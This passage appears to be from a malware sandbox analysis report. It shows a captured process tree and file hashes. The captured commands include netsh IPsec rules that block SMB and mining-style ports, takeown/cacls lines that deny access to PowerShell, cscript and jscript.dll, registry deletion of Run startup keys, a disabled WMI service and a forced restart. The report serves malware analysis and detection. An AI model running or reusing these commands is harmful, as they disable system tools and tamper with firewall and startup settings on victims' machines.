BTAHQAYQB5AE8AbgBUAG8AcAApAA0ACgA=5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rggv1fbn\rggv1fbn.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA519.tmp" "c:\Users\Admin\AppData\Local\Temp\rggv1fbn\CSCA590C36B64244F50A7B939F1BC9B4E.TMP"7⤵PID:2948
-
-
-
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3839D91D0959710BD627596DDF39360B2⤵
- Loads dropped DLL
PID:4168
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 197B3FAD1AF5F72B47A4472650F25C5A E Global\MSI00002⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\SysWOW64\powercfg.exe"C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye3⤵PID:1704
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter13⤵PID:1756
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP3⤵PID:3356
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP3⤵PID:3780
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP3⤵PID:1956
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP3⤵PID:512
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP3⤵PID:4160
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP3⤵PID:3212
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP3⤵PID:2220
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP3⤵PID:5108
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP3⤵PID:1560
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP3⤵PID:4348
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP3⤵PID:3344
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP3⤵PID:2576
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP3⤵PID:4520
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP3⤵PID:2276
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP3⤵PID:1488
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP3⤵PID:1060
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP3⤵PID:4548
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block3⤵PID:220
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion13⤵PID:720
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y3⤵PID:4660
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N3⤵PID:2088
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N3⤵PID:4888
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4284
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N3⤵PID:3536
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N3⤵PID:1988
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N3⤵PID:516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f3⤵PID:2656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f3⤵PID:3372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f3⤵PID:4736
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\SysWOW64\sc.exe" stop wmiApSrv3⤵
- Launches sc.exe
PID:3248
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled3⤵
- Launches sc.exe
PID:4132
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58c0c8d57a5a858eb590e91b5b30a7b0a
SHA17a1a5b2a523b59b82273f31a3dbb956d81ea786a
SHA2563b00859273a3b8b6066691c75e5c51b403188f2c55292125a5eb57c3c1c1cea1
SHA512ced6c80e492a722ead4b14228f813a1bb0b741fab17e06d0fca4bfafeadcc41c3310008ce056a3f71f3bb455a9e0032e9ae04deca7df8277bb7c69de3825b432
-
Filesize
1KB
MD5b82587d8b1696d4e955d8600f4428afc
SHA1aef7b28d1a11463a3834a4e5275407873c364132
SHA2561a7ed1cbf13a9c3793799ccac9a8929d36fc356ff4dd8caf974200c1aefe38b2
SHA512e6eba1d9439b352626c2d75fd246243e6c8be9a6e6f06da07a398a68f84a948e17c81d83c1af1c8c46a188d54a356020531ab0d7f161d650cb91f6dc5eaa596d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5b6f768e299ec7a1d56c81b47a7d3c049
SHA14247e844bde4a8f1f0f7694acf8d6ae82b2a156c
SHA25692a0bc5ebf5083ba1922408b70c877508bad21702d29fdd45dce07f70ae2d028
SHA512b6e340aeb926079c0217651a7ff3656aa4dbbb7ea907f2ccd7fa634dcd028e86832ddc03637859a95ffeb2fab22c7c298fe59c0429dc9fd3caec5826df15cc5e
-
Filesize
2.9MB
MD5eb9a4cf233789b96f940be0186a26988
SHA1002a1cee740fa212732379d1f00dbcf7c0cccbf2
SHA25624d40ba4bf19e3cb942918eb8091ab467b11d5d737aef8e37cffc5306d0081d8
SHA512725eefc24cf43ad0d5022f20608b1d149e9a4285cde7dc21b621aca3647d402a2ac7a2c0751614bae5f6d98c2b52e280e471f7f67f8916041c042bd1911784ce
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
537KB
MD5d7ec04b009302b83da506b9c63ca775c
SHA16fa9ea09b71531754b4cd05814a91032229834c0
SHA25600c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4
SHA512171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c
-
Filesize
537KB
MD5d7ec04b009302b83da506b9c63ca775c
SHA16fa9ea09b71531754b4cd05814a91032229834c0
SHA25600c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4
SHA512171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
Filesize
652B
MD5fd556046c64be200a9bedc55ffd422f3
SHA1573023a5fa861d9b1fbcc4ec6e8732e6d5c3fc03
SHA2565a02430d7a0c19d05bc63ef0c8c9393d8c0973a218c6af567b1f5386b90b44f2
SHA512d39be27808fb7d7b27a7276f1b33a17f950d1c94fb9bbf94c22d9c03b6e7748763ea2d9b720df2c22c5bbc1077d6e626f0df53b82a721ea58a8553e35f2c9110
-
Filesize
354B
MD55cc66596055771b708c426b09785ed18
SHA1fe11be68b5f5f01304e2c6b62458ba70ccc9a575
SHA256530c7292814fa916aa2846672d0bd17cb4ba54cb8f4f61b9d84e01a51b857c08
SHA512dc0c9385a85ade45584fc782de2ab285d5ceb535d0ef6d19b610e34c1fde5e6e76fc88d0b6b0e9f922562c4fe26aaaccf6204fae5053e3679f3a104cbf2dfd5c
-
Filesize
369B
MD57110b583e38c4b53e6301ee10e077f92
SHA1ec8b25f61af8e3e51ade69b8b03f917b966965a8
SHA25631eba742505d5b3f45f8d2c37145950f4170cadfba268bea8c45047b93cb9dd3
SHA51208a4bafb56a37f923296108edd67093ea1fe4ab96ea24848a34d5598535339e90810271e1062fc7134a59ed8c180efbd90f8ac5ba25dec63c12d9693de491142